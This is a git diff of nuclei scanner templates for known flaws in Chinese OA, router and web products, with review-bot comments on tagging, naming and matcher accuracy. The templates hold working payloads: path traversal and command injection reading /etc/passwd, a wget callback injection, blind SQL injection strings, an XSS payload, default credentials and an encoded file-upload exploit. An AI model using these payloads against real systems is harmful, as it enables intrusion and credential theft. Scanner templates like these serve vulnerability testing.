+id: api-linkfinder
+info:
+ name: API Recon
+ author: nullenc0de
+ severity: info
+ tags: file
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ extractors:
+ - type: regex
+ name: url_params
+ regex:
+ - '[&\?][a-zA-Z0-9\_]+='
+ - type: regex
+ name: relative_links
+ regex:
+ - ([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}(?:[a-zA-Z]{1,4}|action)(?:[\?|#][^"|']{0,}|))
diff --git a/nuclei-templates/Other/Alibaba-Anyproxy-fileRead.yaml b/nuclei-templates/Other/Alibaba-Anyproxy-fileRead.yaml
new file mode 100644
index 0000000000..867c10d7d7
--- /dev/null
+++ b/nuclei-templates/Other/Alibaba-Anyproxy-fileRead.yaml
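Review bot: `tags: file` on api-linkfinder is misleading: the template has no `file:` section and issues an HTTP GET to `{{BaseURL}}`, so anyone selecting templates with `-tags file` would pull in a network request under a tag that denotes local-file scanning. A tag describing what the template does, such as `tags: recon,extractor`, would fit; a `description:` is also missing. Separately, in the relative_links regex the `|` inside the character classes `[\?|#]` and `[^"|']` is a literal character, not an alternation, which is harmless in the first class but in the second excludes any link containing `|` from extraction; if alternation was intended, `[?#]` and `[^"']` express it.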
@@ -0,0 +1,23 @@
+id: Alibaba-Anyproxy-fileRead
+info:
+ name: Alibaba Anyproxy fetchBody file arbitrary file read
+ author: str1am
+ severity: high
+ reference:
+ - https://github.com/alibaba/anyproxy/issues/391
+ tags: H5AnyproxyS,fileRead
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/fetchBody?id=1/../../../../../../../../etc/passwd"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "root:x"
+ - "CONNECT"
+ part: body
+ condition: and
diff --git a/nuclei-templates/Other/aolynkbr304-weakpass.yaml b/nuclei-templates/Other/AolynkBR304-weakPass.yaml
similarity index 100%
rename from nuclei-templates/Other/aolynkbr304-weakpass.yaml
rename to nuclei-templates/Other/AolynkBR304-weakPass.yaml
diff --git a/nuclei-templates/Other/Apache-NiFi-rce.yaml b/nuclei-templates/Other/Apache-NiFi-rce.yaml
new file mode 100644
index 0000000000..3760ba9222
--- /dev/null
+++ b/nuclei-templates/Other/Apache-NiFi-rce.yaml
@@ -0,0 +1,23 @@
+id: Apache-NiFi-rce
+info:
+ name: Apache NiFi系统API命令执行
+ author: Str1am
+ severity: high
+ reference: https://github.com/imjdl/Apache-NiFi-Api-RCE/blob/master/exp.py
+ tags: NiFi,rce
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/nifi-api/access/config"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "supportsLogin"
+ - "config"
+ - "true"
+ part: body
+ condition: and
diff --git a/nuclei-templates/Other/Biometric-detect.yaml b/nuclei-templates/Other/Biometric-detect.yaml
new file mode 100644
index 0000000000..b6f0a2b958
--- /dev/null
+++ b/nuclei-templates/Other/Biometric-detect.yaml
@@ -0,0 +1,13 @@
+id: biometric-detect
+info:
+ name: Biometric or Fingerprint detect
+ author: gaurang
+ severity: info
+file:
+ - extensions:
+ - all
+ matchers:
+ - type: word
+ words:
+ - "android.permission.USE_FINGERPRINT"
+ - "android.permission.USE_BIOMETRIC"
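Review bot: The word matcher in Apache-NiFi-rce.yaml does not establish the condition the template is named and rated for: as far as I know `/nifi-api/access/config` on a NiFi instance that does require login answers with `{"config":{"supportsLogin":true}}`, which contains all three words `supportsLogin`, `config` and `true`, so every reachable NiFi API is reported as a high-severity "rce". If the intent is to flag instances whose API accepts requests without authentication, the match should be on the negative value, `- '"supportsLogin":false'`, and the name and a `description:` (currently missing) should state that the template detects an unauthenticated API rather than demonstrating command execution.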
diff --git a/nuclei-templates/Other/BlindSQL.yaml b/nuclei-templates/Other/BlindSQL.yaml deleted file mode 100644 index de40926d67..0000000000 --- a/nuclei-templates/Other/BlindSQL.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: time-based-sqli -info: - name: Time-Based Blind SQL Injection - author: KhukuriRimal - severity: Critical - description: Detects time-based blind SQL injection vulnerability -http: - - method: GET - path: - - "{{BaseURL}}" - headers: - Authorization: "Bearer eyasdsad.asdsad.asdsad" - payloads: - injection: - - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "if(now()=sysdate(),SLEEP(7),0)" - - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" - - "XOR(if(now()=sysdate(),sleep(7),0))XOR" - - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337" - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - "status_code == 200" - - "duration >= 7 && duration <= 16" - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/CNVD-2018-13393.yaml b/nuclei-templates/Other/CNVD-2018-13393.yaml deleted file mode 100644 index 14115a5565..0000000000 --- a/nuclei-templates/Other/CNVD-2018-13393.yaml +++ /dev/null 
@@ -1,29 +0,0 @@ -id: CNVD-2018-13393 -info: - name: Metinfo - Local File Inclusion - author: ritikchaddha - severity: high - description: Metinfo is susceptible to local file inclusion. - reference: - - https://paper.seebug.org/676/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cwe-id: CWE-22 - tags: metinfo,cnvd,cvnd2018,lfi -requests: - - method: GET - path: - - '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php' - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "<?php" - - "login_met_cookie($metinfo_admin_name);" - condition: and - -# Enhanced by mp on 2022/07/05 diff --git a/nuclei-templates/Other/CNVD-2019-32204.yaml b/nuclei-templates/Other/CNVD-2019-32204.yaml new file mode 100644 index 0000000000..3459d11a6c --- /dev/null +++ b/nuclei-templates/Other/CNVD-2019-32204.yaml 
@@ -0,0 +1,27 @@
+id: CNVD-2019-32204
+info:
+ name: Fanwei e-cology <=9.0 - Remote Code Execution
+ author: daffainfo
+ severity: critical
+ description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
+ reference:
+ - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cwe-id: CWE-77
+ tags: fanwei,cnvd,cnvd2019,rce
+requests:
+ - raw:
+ - |
+ POST /bsh.servlet.BshServlet HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/05/12
diff --git a/nuclei-templates/Other/CNVD-2021-01627.yaml b/nuclei-templates/Other/CNVD-2021-01627.yaml
deleted file mode 100644
index 2a6dc252ce..0000000000
--- a/nuclei-templates/Other/CNVD-2021-01627.yaml
+++ /dev/null
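Review bot: The last two sentences of `description:` in CNVD-2019-32204.yaml ("Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible ...") are remediation advice rather than a description of the weakness, and nuclei's `info` block has a dedicated `remediation:` field for exactly that. Moving them, e.g. `remediation: Apply the vendor security patch for Fanwei e-cology OA.`, keeps the description factual and lets report consumers find the fix guidance where the schema puts it.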
@@ -1,42 +0,0 @@ -id: CNVD-2021-01627 -info: - name: Zhiyuan OA Arbitrary File Upload - author: daffainfo - severity: critical - reference: http://disk.scan.cm/zlsec/zlsec_info/document/wiki/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20ajax.do%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%20CNVD-2021-01627.md?hash=zE0KEPGJ - tags: zhiyuan,rce,cnvd,cnvd2021 -requests: - - raw: - - | - POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1 - Host: {{Hostname}} - Connection: close - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Sec-Fetch-Site: none - Sec-Fetch-Mode: navigate - Sec-Fetch-User: ?1 - Sec-Fetch-Dest: document - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - loginPageURL=; login_locale=zh_CN; - Content-Type: application/x-www-form-urlencoded - - 
managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%0AuTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28%2A%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%C2%9D%C2%9D%C2%87%C3%B6%C2%A8%1F%C2%A6I%C3%99y%C3%B8%09%C3%8B%C3%9C%5DH%03%0F%C3%A3%C3%9A%C2%87%C2%9D%C2%98%C3%9C%C3%80%2C%C2%A9%5Cn%C3%8CJ%C3%8B+sE%C3%A1%C2%B6%25%C2%B5%C2%8CE%C3%8ERe%C3%81%2C.%C3%96%5C%12%402%C3%8F%01%C2%AF%C3%A7k%C2%A2%14%C2%AE6%C2%96%C2%8F%C2%83%C2%97%C3%A2%28.%22%5B%C2%93%7CH%C3%B4%0Ap%C2%B8pC%16m%C2%B4a%25%C2%85%C3%83g%27R%C2%AE%5B%C2%A2%26%C2%80%C3%A8%21%141gk%C3%82%C3%952+%C2%96D%C2%9C%01q%5C%C3%81%1A%C2%9F%2C8K%13%06%C3%B4%3D%5D%C2%A38mx%C3%93%C3%8F-%7E%25%C2%80%C2%A5Z%7C%2A%C2%A3%C2%B8%C2%B6%C2%B1%C3%89e%24%15%C2%BB%C2%B0%C3%BC%07%C3%B0%2F%C3%9FlQ%0F%5DqQY%C2%A6%C2%9A%C2%B8%C3%9C%C3%B0Q%12%C2%95%C3%942%C2%95%C2%9B%C2%B48%C3%BA%C2%B6%19%C2%B0%C2%B6%21%C2%9CA5%C2%99Q%C2%9D%1B%60%C3%8B%C3%822T%0C%C2%A2L%C2%97%C3%A7%C2%AD%C3%9EA%1C%07%14%C2%A3%C2%92%C3%84M%C3%A2%C3%B1%C3%8A%00PZ%C2%A6%C3%B4%C2%96%1F%5C%C2%A1%C2%B1J%1Dc%C3%A3%C3%AF%C2%B92%00%C3%BC%C3%86%C2%B7%C2%AB%00y%C2%A6%C2%8A%C2%A5E%06-%C2%84G4%3E%16%C2%9A%C2%AB%5CZ%C2%B6vk%C2%A2b%C2%9B%C3%A0%C3%9C%3E%C2%B6%C3%98%C2%B2%28%C2%A5%C2%9Bi%C2%89%C3%96%C2%A4%C3%84.%C2%81%C2%AC3%3D%C2%8FN%26%C3%BBLsZ%C3%A7%C3%BDl%1B%C2%B5%C3%9E%2A%C2%A09%C2%A0%C3%B9%C2%BB%C3%A7-RB%40%C3%B0%15%C2%8A%25%C2%863%C3%A1%00%C2%97%C2%AB%C3%84%25%C3%80wn%2C%C2%B2%0F%C3%BB%C2%81%7D%C3%98T%5B%C3%83%C3%86V%C2%A8%C2%9F%C2%B7%07i%60%21i%04
8%C3%BD%C3%96%C3%94%00%09Wh%C2%AA%C2%86e%C2%94%03%5B%C3%B3%11%C3%94%C2%A4%C3%94%C2%A9%C3%8E%C2%A3%3D%C2%87%C2%AFN%1B%C3%A3%C3%B8%C2%8D%5E%13%C2%88%C3%A1%1C%C3%93%C2%BA%C2%AA%C2%81K%14%2COW%13U%C3%9F+%C3%B9%C2%90%C2%85k%1A%C2%83c%C3%AE%C3%A3%0D%2As%C3%9B%04%C3%BE%C2%91%C3%93%C3%83%3AV%C2%8D%C3%93%C2%85%23%3F%C3%81V%C3%A5%C3%87%1F%C3%BE%C2%8C%C3%AC_%C3%BFL%C3%A4JB%C2%B2%C3%96%C3%88%C2%A7u%C2%BE%40%C3%A5%27%C3%AB7%7C%C3%AD%3Cr%C2%89%C3%8E%C3%93%C3%BA%C3%84P%0C%12P5zm%7Dj%C2%BD%C3%86%C2%AF_k%23O%C3%8FT%0Eb%C2%AB%12%C3%8E.k%C3%93%7C%2CRY%140%C2%AC%267h%0Cs%C3%97%C3%807%C3%BA6%C3%9D%C3%AB%C3%8AB%09%C3%959%C3%8Dkq%C2%B7%C3%8B%C2%9B%C3%BE%C3%A0T%C2%BC%C2%8Ftb%C3%93%5E%C2%95%C2%97%2B%0CL%1D%03%7E%C2%9F%C3%9B%C2%9C%C3%8E%1E%C2%89%C3%BE%C3%B6G%0Ej%C2%9AN%C2%ADK%C2%8E1%C3%B53%C2%A11%C3%90%C3%B8%C3%A1%C3%8A%C2%8D%14%C3%962%C2%84%C2%90%C3%86G%C3%BD%C3%90Kh%2CRP%05MO%C3%AF%C2%B9q%0EE%7D%08imw%C3%93q%C3%93%C2%93%C2%80S%2A%C3%87%C2%9C%C2%B0%C2%AE%C2%A8%C2%B3%C2%BB%C3%B0Z%C2%B4u%5D%15.%C2%BF%7F%7C%C2%9Fr%26%C3%8D%C2%A3%3EA%29%C3%A8O%5E%C2%B4%C3%B9%C2%B7%C3%A1%C3%8C%031%C2%A4%C2%83%0E%C3%AFw%3B%C3%A3%C2%9F%2B%C3%B5%C3%BE%3B%C3%95%C2%AD%C3%99%C2%9Dim%5B%C2%A6w%07%C3%AC%C2%B7%C3%B7%24%3F%C2%9D%28%40%C2%B3%04%1E%C2%BEt%C2%8E%C2%87%C3%85%C3%97%C3%A7%C2%8FK%C3%A2%C3%A3%C2%9E%C3%A97%0C%C2%8Ez%1F%C3%81%C3%BFO%17%C3%A08%C3%B5%C2%A8c%3F%C2%BE%C3%97%7B%C2%90%12%C3%90%3B1i%C3%A6d%080eY%C3%B6%1E%5E%C2%BB%3F%C3%A8r%C2%A4%0B%C3%B2%C2%B5%C2%BE%C2%B3K%C3%AEu%C3%BF%C3%BE%17%1CR%C2%AD%17W%05%00%00 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"message":null' - - '"details":null' - - '"code"' - condition: and - - type: word - part: header - words: - - 'application/json' - - type: status - status: - - 500 diff --git a/nuclei-templates/Other/CNVD-2021-09650.yaml b/nuclei-templates/Other/CNVD-2021-09650.yaml deleted file mode 100644 index 96c4ff58fd..0000000000 --- a/nuclei-templates/Other/CNVD-2021-09650.yaml +++ /dev/null 
@@ -1,24 +0,0 @@
-id: CNVD-2021-09650
-
-info:
- name: Ruijie EWEB Gateway Platform Command Execution
- author: daffainfo
- severity: critical
- reference: http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
- tags: ruijie,cnvd,cnvd2021,rce
-
-requests:
- - raw:
- - |
- POST /guest_auth/guestIsUp.php
- Host: {{Hostname}}
-
- mac=1&ip=127.0.0.1|wget {{interactsh-url}}
-
- unsafe: true
- matchers:
- - type: word
- part: interactsh_protocol
- name: http
- words:
- - "http"
diff --git a/nuclei-templates/Other/CNVD-2021-14536.yaml b/nuclei-templates/Other/CNVD-2021-14536.yaml
new file mode 100644
index 0000000000..dbb561741e
--- /dev/null
+++ b/nuclei-templates/Other/CNVD-2021-14536.yaml
@@ -0,0 +1,40 @@
+id: CNVD-2021-14536
+info:
+ name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure
+ author: daffainfo
+ severity: high
+ description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.
+ reference:
+ - https://www.adminxe.com/2163.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ metadata:
+ fofa-query: title="RG-UAC登录页面"
+ tags: ruijie,cnvd,cnvd2021,disclosure
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/get_dkey.php?user=admin"
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"pre_define"'
+ - '"auth_method"'
+ - '"name"'
+ - '"password"'
+ condition: and
+ - type: status
+ status:
+ - 200
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":'
+
+# Enhanced by mp on 2022/03/28
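Review bot: The extractor in CNVD-2021-14536.yaml captures `(["a-z:,0-9]+)` between `"role":"super_admin",` and `"lastpwdtime":`, which by the template's own description is the administrator's account and password data, and nuclei writes extracted values into console output and `-o`/JSON reports. For a detection template that material does not need to be retained: the word matchers already require `"name"` and `"password"` to be present, so dropping the extractor, or narrowing the capture to the account name field, avoids copying administrator credentials into every scan log. If the extraction is deliberate, a comment above it saying so would help, e.g. `# extractor intentionally records the leaked credential fields as evidence`.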
diff --git a/nuclei-templates/Other/CNVD-2021-15822.yaml b/nuclei-templates/Other/CNVD-2021-15822.yaml index 02ff83b22e..0a1beb38a7 100644 --- a/nuclei-templates/Other/CNVD-2021-15822.yaml +++ b/nuclei-templates/Other/CNVD-2021-15822.yaml @@ -1,32 +1,22 @@ id: CNVD-2021-15822 - info: name: ShopXO Download File Read author: pikpikcu severity: high - reference: - - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog - metadata: - verified: true - shodan-query: title:"ShopXO企业级B2C电商系统提供商" - fofa-query: app="ShopXO企业级B2C电商系统提供商" - tags: shopxo,lfi,cnvd,cnvd2021 - + reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog + tags: shopxo,lfi requests: - raw: - | GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - matchers-condition: and matchers: - type: regex regex: - - "root:.*:0:0:" - + - "root:[x*]:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/03/17 diff --git a/nuclei-templates/Other/CNVD-2021-26422.yaml b/nuclei-templates/Other/CNVD-2021-26422.yaml new file mode 100644 index 0000000000..c9485ec160 --- /dev/null +++ b/nuclei-templates/Other/CNVD-2021-26422.yaml 
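Review bot: The new `tags: shopxo,lfi` in CNVD-2021-15822.yaml drops `cnvd,cnvd2021`, which makes this template inconsistent with the other CNVD-2021 templates added in this same commit (`CNVD-2021-14536.yaml` and `CNVD-2021-26422.yaml` both carry `cnvd,cnvd2021`), so a run filtered with `-tags cnvd` would silently stop covering it; `tags: shopxo,lfi,cnvd,cnvd2021` keeps the repository convention. The new side also turns `reference:` from a list into a scalar, which nuclei accepts but which differs from the list form the sibling templates use.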
@@ -0,0 +1,32 @@ +id: CNVD-2021-26422 +info: + name: eYouMail - Remote Code Execution + author: daffainfo + severity: critical + description: eYouMail is susceptible to a remote code execution vulnerability. + reference: + - https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py + - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: eyoumail,rce,cnvd,cnvd2021 +requests: + - raw: + - | + POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type='|cat /etc/passwd||' + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/Other/CNVD-2022-03672.yaml b/nuclei-templates/Other/CNVD-2022-03672.yaml index b96b1bebfe..d25c9a171a 100644 --- a/nuclei-templates/Other/CNVD-2022-03672.yaml +++ b/nuclei-templates/Other/CNVD-2022-03672.yaml @@ -1,18 +1,13 @@ id: CNVD-2022-03672 info: - name: Sunflower Simple and Personal - Remote Code Execution + name: Sunflower Simple and Personal edition RCE author: daffainfo severity: critical - description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability. reference: - https://www.1024sou.com/article/741374.html - https://copyfuture.com/blogs-details/202202192249158884 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: cnvd,cnvd2020,sunflower,rce requests: - raw: 
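Review bot: The context line `tags: cnvd,cnvd2020,sunflower,rce` in CNVD-2022-03672.yaml carries a year tag that disagrees with the template id and with the cnvd.org.cn references, which are CNVD-2022 entries; this looks like a copy-paste leftover and should read `tags: cnvd,cnvd2022,sunflower,rce`. With `description:` and `classification:` gone in this hunk, the `info` block no longer records a CWE or CVSS vector, so nothing in the file explains why it is `severity: critical`; a one-line `description:` would at least keep that readable. The `requests:` section continues outside the hunk.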
@@ -41,5 +36,3 @@ requests:
 - "contains(body_1, 'verify_string')"
 - "contains(body_2, 'Windows IP')"
 condition: and
-
-# Enhanced by mp on 2022/05/12
diff --git a/nuclei-templates/Other/CRMEB-sqli.yaml b/nuclei-templates/Other/CRMEB-sqli.yaml
new file mode 100644
index 0000000000..9d8c0de9d8
--- /dev/null
+++ b/nuclei-templates/Other/CRMEB-sqli.yaml
@@ -0,0 +1,18 @@
+id: CRMEB-sqli
+info:
+ name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges
+ author: Str1am
+ severity: high
+ tags: CRMEB,sqli
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/products?sid=1%27"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Syntax error"
+ - "SQLSTATE"
+ part: body
+ condition: and
diff --git a/nuclei-templates/CVE-2024/CVE-2024-0195.yaml b/nuclei-templates/Other/CVE_2024_0195.yaml
similarity index 100%
rename from nuclei-templates/CVE-2024/CVE-2024-0195.yaml
rename to nuclei-templates/Other/CVE_2024_0195.yaml
diff --git a/nuclei-templates/Other/Chinaunicom-Default-Login.yaml b/nuclei-templates/Other/Chinaunicom-Default-Login.yaml
deleted file mode 100755
index a222a7508d..0000000000
--- a/nuclei-templates/Other/Chinaunicom-Default-Login.yaml
+++ /dev/null
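Review bot: `name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges` in CRMEB-sqli.yaml does not describe this template: the id, the tags and the request (`/api/products?sid=1%27`, matched on `Syntax error` and `SQLSTATE` in the body) are an error-based SQL injection probe against CRMEB, so the name reads as a copy-paste leftover from another template and would mislabel every finding in a report. `name: CRMEB - SQL Injection (Error Based)` would match the content; `description:` and `reference:` are also missing from `info`.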
@@ -1,36 +0,0 @@ -id: Chinaunicom-Default-Login -info: - name: 中国联通光猫默认口令 - author: - - l0ne1y - description: |- - 中国联通光猫默认口令 - 中国联通光猫存在默认凭证CUAdmin/CUAdmin。使用该凭证容易被攻击者轻易进入后台,造成敏感信息泄漏。 - severity: high - remediation: |- - #### 官方修复方案: - 升级系统至无漏洞版本,或于官网下载安全补丁。 - #### 临时修复方案: - 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。<br />2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。<br />3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。<br />4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/)<br />5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) -requests: -- matchers: - - type: status - status: - - 302 - - type: word - part: header - words: - - /menu.gch - matchers-condition: and - raw: - - | - POST /cu.html HTTP/1.1 - Host: {{Hostname}} - - frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password= - attack: pitchfork - payloads: - password: - - CUAdmin - username: - - CUAdmin diff --git a/nuclei-templates/Other/DOM-XSS-SiteMinder.yaml b/nuclei-templates/Other/DOM-XSS-SiteMinder.yaml new file mode 100644 index 0000000000..5aac16e873 --- /dev/null +++ b/nuclei-templates/Other/DOM-XSS-SiteMinder.yaml 
@@ -0,0 +1,25 @@
+id: siteminder-dom-based-xss
+info:
+ name: SiteMinder DOM BASED XSS
+ author: Clark
+ severity: medium
+ description: SiteMinder DOM Based XSS.
+ tags: dom,xss
+ reference: https://blog.reigningshells.com/2019/12/reviving-old-cves-reflected-xss-in-ca.html
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'
+ - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - 'confirm(document.domain)'
+ - type: word
+ words:
+ - 'text/html'
+ part: header
diff --git a/nuclei-templates/Other/Dahua_Video_FileUpload.yaml b/nuclei-templates/Other/Dahua_getUserInfoByUserName.yaml
similarity index 100%
rename from nuclei-templates/Other/Dahua_Video_FileUpload.yaml
rename to nuclei-templates/Other/Dahua_getUserInfoByUserName.yaml
diff --git a/nuclei-templates/Other/digital-signage-rce.yaml b/nuclei-templates/Other/Digital-Signage-rce.yaml
similarity index 100%
rename from nuclei-templates/Other/digital-signage-rce.yaml
rename to nuclei-templates/Other/Digital-Signage-rce.yaml
diff --git a/nuclei-templates/Other/GLPIDirectoryListing.yaml b/nuclei-templates/Other/GLPIDirectoryListing.yaml
deleted file mode 100644
index 8101849542..0000000000
--- a/nuclei-templates/Other/GLPIDirectoryListing.yaml
+++ /dev/null
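Review bot: Both paths in DOM-XSS-SiteMinder.yaml are single-quoted YAML scalars, in which a backslash has no escape meaning, so `\u003c`, `\u0020` and `\u0022` are sent as literal six-character sequences rather than decoded to `<`, space and `"`; the word matcher `confirm(document.domain)` then fires on any echo of the USERNAME value, including one the server has HTML-encoded, so the template reports reflection rather than script execution and will over-report a medium-severity XSS. The quoting and the matcher need to be reconciled so that what is matched is the unencoded markup and not just the parameter text; as a secondary point, the id and name say "DOM based" while the only reference describes a reflected XSS, so one of them is mislabelled and `description: SiteMinder DOM Based XSS.` should say which and why.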
